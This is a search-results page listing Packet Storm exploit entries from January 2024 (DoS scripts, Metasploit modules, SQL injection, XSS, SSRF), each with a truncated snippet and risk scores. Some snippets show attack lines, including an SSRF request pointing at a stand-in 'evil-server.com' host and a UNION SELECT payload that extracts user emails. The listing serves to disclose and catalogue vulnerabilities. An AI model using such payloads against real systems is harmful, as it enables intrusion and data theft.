Lucene search
K
PacketstormRecent

50738 matches found

Packet Storm
Packet Storm
added 2024/01/22 12:0 a.m.288 views

Golden FTP Server 2.02b Denial Of Service

!/usr/bin/perl use IO::Socket::INET; Exploit Title: Golden FTP Server 2.02b - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 21 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/1AK6x0xKwjVZxoNHbCOIJsIiRAWeMmP0/view?usp=sharing Notification...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/22 12:0 a.m.563 views

Traceroute 2.1.2 Privilege Escalation

Description: In Traceroute 2.0.12 through to 2.1.2 fixed in 2.1.3, the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts are: tcptraceroute, tracepath, traceproto and traceroute-nanog...

5.5CVSS7.4AI score0.00367EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/22 12:0 a.m.339 views

EzServer 6.4.017 Denial Of Service

!/usr/bin/perl use IO::Socket; Exploit Title: EzServer 6.4.017 - Denied of Service DoS Discovery by: Fernando Mengali Discovery Date: 22 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/1hCYYsWsyeuoHTh3ZosNRbtIBxw0culsu/view?usp=sharing Notification vendor: No...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/22 12:0 a.m.476 views

Ivanti Connect Secure Unauthenticated Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Ivanti Connect Secure Unauthenticated Remote Code Execution', 'Description' = %q This module chains an authentication bypass vulnerability...

9.1CVSS7.4AI score0.99999EPSS
Exploits23
Packet Storm
Packet Storm
added 2024/01/22 12:0 a.m.364 views

ProSysInfo TFTP Server TFTPDWIN 0.4.2 Denial Of Service

!/usr/bin/perl use IO::Socket::INET; Exploit Title: ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 20 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/1MLqBkCyu0dA-cNgYxCAO8xbsVcof060Z/view?usp=sharin...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/22 12:0 a.m.316 views

xbtitFM 4.1.18 SQL Injection / Shell Upload / Traversal

Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities Date: 22-01-2024 Exploit Author: Who cares anyway Vendor Homepage: https://xbtitfm.eu Affected versions: 4.1.18 and prior CVE : Who cares anyway Description: The SQLi and the path traversal are unauthenticated, they don't require any user...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/22 12:0 a.m.280 views

MajorDoMo Command Injection

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'MajorDoMo Command Injection', 'Description' = %q This module exploits a command injection vulnerability in MajorDoMo versions before 0662e5e. ,...

9.8CVSS7.4AI score0.38263EPSS
Exploits6
Packet Storm
Packet Storm
added 2024/01/22 12:0 a.m.341 views

TrojanSpy Win32 Nivdort MVID-2024-0668 Insecure Permissions

Discovery / credits: Malvuln John Page aka hyp3rlinx c 2024 Original source: https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txt Contact: [email protected] Media: twitter.com/malvuln Threat: TrojanSpy Win32 Nivdort Vulnerability: Insecure Permissions - EoP SYSTEM Family: Nivdort...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/19 12:0 a.m.330 views

Lepton CMS 7.0.0 Remote Code Execution

Exploit Title: LeptonCMS Version : 7.0.0 Remote Code Execution Date: 2024-1-19 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: https://www.lepton-cms.com/ Version : 7.0.0 Tested on: https://www.softaculous.com/apps/cms/LEPTON 1 Login with admin cred...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/19 12:0 a.m.386 views

Apache Commons Text 1.9 Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache Commons Text RCE', 'Description' = %q This exploit takes advantage of the StringSubstitutor interpolator class, which is included in the...

9.8CVSS7.4AI score0.99931EPSS
Exploits41
Packet Storm
Packet Storm
added 2024/01/19 12:0 a.m.278 views

MiniWeb HTTP Server 0.8.1 Denial Of Service

!/usr/bin/perl use IO::Socket; Exploit Title: MiniWeb HTTP Server 0.8.1 - Denied of Service DoS Discovery by: Fernando Mengali Discovery Date: 19 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/1AVHSlsYj5Ukw9co9M2Ql6RsqCTzbI038/view?usp=sharing Notification...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/19 12:0 a.m.458 views

Linux 5.6 io_uring Cred Refcount Overflow

Linux =5.6: cred refcount overflow at 39 GiB memory usage via iouring see also my related prior bug reports about overflowing refcounts with lots of RAM usage: https://crbug.com/project-zero/809: BPF program refcount, with 32GiB RAM https://crbug.com/project-zero/1752: page-refcount via FUSE with...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/19 12:0 a.m.344 views

Firefox 121 / Chrome 120 Denial Of Service

Minor firefox DoS - semi silently polluting /Downloads with files part 2 Tested on: firefox 121 and chrome 120 on GNU/linux Date: Thu Jan 18 08:38:28 AM UTC 2024 This is barely a DoS, but since it might affect Chrome too we decided to disclose it. If firefox user visits a specially crafted page,...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/18 12:0 a.m.344 views

SpyCamLizard 1.230 Denial Of Service

!/usr/bin/perl use IO::Socket::INET; Exploit Title: SpyCamLizard 1.230 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 18 january 2024 Vendor Homepage: http://www.spycamlizard.com Download to demo:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/18 12:0 a.m.361 views

Ansible Agent Payload Deployer

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Ansible Agent Payload Deployer', 'Description' = %q This exploit module creates an ansible module for deployment to nodes in the network. It...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/18 12:0 a.m.561 views

WordPress Backup Migration 1.3.7 Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Backup Migration Plugin PHP Filter Chain RCE', 'Description' = %q This module exploits an unauth RCE in the WordPress plugin: Backup...

9.8CVSS7.4AI score0.97846EPSS
Exploits14
Packet Storm
Packet Storm
added 2024/01/17 12:0 a.m.326 views

Easy File Sharing FTP 3.6 Denial Of Service

!/usr/bin/perl use Net::FTP; Exploit Title: Easy File Sharing FTP Server 3.6 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 17 january 2024 Vendor Homepage: N/A Download to demo: Notification vendor: No reported Tested Version: Easy File Sharing FTP Server 3.6 Tested on:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/16 12:0 a.m.372 views

LightFTP 1.1 Denial Of Service

!/usr/bin/perl use Net::FTP; Exploit Title: LightFTP 1.1 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 15 january 2024 Vendor Homepage: N/A Notification vendor: No reported Tested Version: LightFTP 1.1 Tested on: Window XP Professional - Service Pack 2 and 3 - English...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/16 12:0 a.m.379 views

MailCarrier 2.51 Denial Of Service

!/usr/bin/perl use IO::Socket::INET Exploit Title: MailCarrier 2.51 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 16 january 2024 Tested Version: MailCarrier 2.51 Tested on: Window XP Professional - Service Pack 2 and 3 - English Vulnerability Type: Denial of Service DoS ...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/15 12:0 a.m.519 views

Korenix JetNet Series Unauthenticated Access

CyberDanube Security Research 20240109-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| Korenix JetNet Series vulnerable version| See "Vulnerable versions" fixed version| - CVE number| CVE-2023-5376, CVE-2023-5347 impact|...

9.8CVSS7.4AI score0.01414EPSS
Exploits4
Packet Storm
Packet Storm
added 2024/01/15 12:0 a.m.401 views

HaoKeKeJi YiQiNiu Server-Side Request Forgery

!/bin/bash Set target URL and payload targeturl="http://example.com/application/pay/controller/Api.php" payload="url=http://evil-server.com/exploit" Send the malicious request response=$curl -s -X POST -d "$payload" "$targeturl" Check if the exploit was successful if echo "$response" | grep -q...

9.8CVSS7.4AI score0.00881EPSS
Exploits1
Packet Storm
Packet Storm
added 2024/01/15 12:0 a.m.364 views

WordPress RSVPMaker 9.3.2 SQL Injection

!/bin/bash Set the URL of the website running the vulnerable plugin url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php" Set the number of columns in the query columns=5 response=$curl -s "$url" query=$echo "$response" | grep -oP 'FROM . WHERE .' payload="' UNION SELECT...

9.8CVSS7.4AI score0.12003EPSS
Exploits3
Packet Storm
Packet Storm
added 2024/01/15 12:0 a.m.401 views

Xitami 2.5 Denial Of Service

!/usr/bin/perl use IO::Socket::INET; Exploit Title: Xitami 2.5 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 14 january 2024 Vendor Homepage: https://imatix-legacy.github.io/xitami.com/ Download to demo:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/15 12:0 a.m.372 views

Taokeyun SQL Injection

!/bin/bash Variables url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php" cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -" Construct the request request="POST $url HTTP/1.1\r\n" request+="Content-Type: application/x-www-form-urlencoded\r\n"...

9.8CVSS7.4AI score0.00792EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/14 12:0 a.m.363 views

freeSSHd 1.0.9 Denial Of Service

!/usr/bin/perl use IO::Socket; Exploit Title: freeSSHd 1.0.9 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 13 january 2024 Vendor Homepage: N/A Download to demo: Notification vendor: No reported Tested Version: freeSSHd 1.0.9 - Denial of Service DoS Tested on: Window XP...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/13 12:0 a.m.310 views

ProSSHD 1.2 20090726 Denial Of Service

!/usr/bin/perl use Net::SSH2 Exploit Title: ProSSHD 1.2 20090726 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 13 january 2024 Vendor Homepage: https://prosshd.com/ Notification vendor: No reported Tested Version: ProSSHD 1.2 20090726 Tested on: Window XP Professional -...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/12 12:0 a.m.396 views

Copyright Loan Management System 2024 1.0 SQL Injection

Title: Copyright © Loan Management System 2024-1.0 Multiple-SQLi Author: nu11secur1ty Date: 01/12/2024 Vendor: https://twitter.com/razormist Software: https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html Reference:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/12 12:0 a.m.428 views

Quick TFTP Server Pro 2.1 Denial Of Service

!/usr/bin/perl use IO::Socket::INET; Exploit Title: Quick TFTP Server Pro 2.1 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 12 january 2024 Vendor Homepage: https://www.tallsoft.com/ Download to demo:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.232 views

PHPJabbers Shared Asset Booking System 1.0 Missing Rate Limit

Exploit Title: PHPJabbers Shared Asset Booking System v1.0 - No Rate Limit Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/shared-asset-booking-system/sectionDemo Version: v1.0 Test...

7.4AI score0.00358EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.371 views

PHPJabbers Event Booking Calendar 4.0 CSV Injection

Exploit Title: PHPJabbers Event Booking Calendar v4.0 - CSV Injection Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/event-booking-calendar/sectionDemo Version: v4.0 Tested on:...

7.4AI score0.0037EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.244 views

SimpleWebServer 2.2-rc2 Denial Of Service

!/usr/bin/perl use IO::Socket::INET; Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 11 january 2024 Vendor Homepage: http://www.pmx.it/ Download to demo:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.286 views

PHPJabbers Cinema Booking System 1.0 Cross Site Scripting

Exploit Title: PHPJabbers Cinema Booking System v1.0 - Reflected Cross-Site Scripting Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/cinema-booking-system/sectionDemo Version: v1.0...

7.4AI score0.00395EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.256 views

PHPJabbers Car Park Booking System 3.0 CSV Injection

Exploit Title: PHPJabbers Car Park Booking System v3.0 - CSV Injection Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/car-park-booking/sectionDemo Version: v3.0 Tested on: Windows...

7.4AI score0.00647EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.343 views

PHPJabbers Cleaning Business Software 1.0 CSV Injection

Exploit Title: PHPJabbers Cleaning Business Software v1.0 - CSV Injection Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/cleaning-business-software/sectionDemo Version: v1.0 Tested...

7.4AI score0.00466EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.339 views

PHPJabbers Restaurant Booking System 3.0 CSV Injection

Exploit Title: PHPJabbers Restaurant Booking System v3.0 - CSV Injection Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/restaurant-booking-system/sectionDemo Version: v3.0 Tested o...

7.4AI score0.00556EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.238 views

PHPJabbers Cinema Booking System 1.0 CSV Injection

Exploit Title: PHPJabbers Cinema Booking System v1.0 - CSV Injection Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/meeting-room-booking-system/sectionDemo Version: v1.0 Tested on:...

7.4AI score0.00765EPSS
Exploits1
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.392 views

PHPJabbers Hotel Booking System 4.0 Missing Rate Limiting

Exploit Title: PHPJabbers Hotel Booking System v4.0 - No Rate Limit Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/hotel-booking-system/sectionDemo Version: v4.0 Tested on: Windows...

7.4AI score0.00679EPSS
Exploits3
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.370 views

PHPJabbers Cinema Booking System 1.0 Missing Rate Limiting

Exploit Title: PHPJabbers Cinema Booking System v1.0 - No Rate Limit Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/cinema-booking-system/sectionDemo Version: v1.0 Tested on: Windo...

7.4AI score0.00538EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.404 views

PHPJabbers Meeting Room Booking System 1.0 Cross Site Scripting

Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - Multiple Stored XSS Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/meeting-room-booking-system/sectionDemo Version: v1....

7.4AI score0.00264EPSS
Exploits1
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.369 views

PHPJabbers Event Ticketing System 1.0 Cross Site Scripting / HTML Injection

Exploit Title: PHPJabbers Event Ticketing System v1.0 - Multiple HTML Injection Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/event-ticketing-system/sectionDemo Version: v1.0 Test...

7.4AI score0.00425EPSS
Exploits3
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.290 views

PHPJabbers Car Park Booking System 3.0 Missing Rate Limiting

Exploit Title: PHPJabbers Car Park Booking System v3.0 - Missing Rate Limiting Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/car-park-booking/sectionDemo Version: v3.0 Tested on:...

7.4AI score0.00461EPSS
Exploits3
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.322 views

PHPJabbers Meeting Room Booking System 1.0 CSV Injection

Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - CSV Injection Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/meeting-room-booking-system/sectionDemo Version: v1.0 Test...

7.4AI score0.00593EPSS
Exploits1
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.341 views

PHPJabbers Shared Asset Booking System 1.0 CSV Injection

Exploit Title: PHPJabbers Shared Asset Booking System v1.0 - CSV Injection Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/shared-asset-booking-system/sectionDemo Version: v1.0 Test...

7.4AI score0.00385EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.240 views

PHPJabbers Bus Reservation System 1.1 Missing Rate Limiting

Exploit Title: PHPJabbers Bus Reservation System v1.1 - No Rate Limit Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/bus-reservation-system/sectionDemo Version: v1.1 Tested on:...

7.4AI score0.00679EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.422 views

WordPress POST SMTP Mailer 2.8.7 Authorization Bypass / Cross Site Scripting

Vulnerability Summary from Wordfence Intelligence Description: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress = 2.8.7 – Authorization Bypass via type connect-app API Affected Plugin: POST SMTP Mailer – Email log, Delivery Failure Notifications and Be...

9.8CVSS7.1AI score0.90339EPSS
Exploits7
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.317 views

PHPJabbers Night Club Booking Software 1.0 Missing Rate Limiting

Exploit Title: PHPJabbers Night Club Booking Software v1.0 - No Rate Limit Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/night-club-booking-software/sectionDemo Version: v1.0 Test...

7.4AI score0.00358EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.369 views

PHPJabbers Event Ticketing System 1.0 Missing Rate Limiting

Exploit Title: PHPJabbers Event Ticketing System v1.0 - No Rate Limit Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/meeting-room-booking-system/sectionDemo Version: v1.0 Tested on...

7.4AI score0.00614EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.301 views

PHPJabbers Shared Asset Booking System 1.0 Cross Site Scripting

Exploit Title: PHPJabbers Shared Asset Booking System v1.0 - Multiple Stored XSS Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/shared-asset-booking-system/sectionDemo Version: v1....

7.4AI score0.0039EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.310 views

PHPJabbers Hotel Booking System 4.0 CSV Injection

Exploit Title: PHPJabbers Hotel Booking System v4.0 - CSV Injection Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/hotel-booking-system/sectionDemo Version: v4.0 Tested on: Windows...

7.4AI score0.00556EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.266 views

PHPJabbers Hotel Booking System 4.0 Cross Site Scripting / HTML Injection

Exploit Title: PHPJabbers Hotel Booking System v4.0 - Multiple HTML Injection Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/hotel-booking-system/sectionDemo Version: v4.0 Tested o...

7.4AI score0.0035EPSS
Exploits3
Total number of security vulnerabilities50738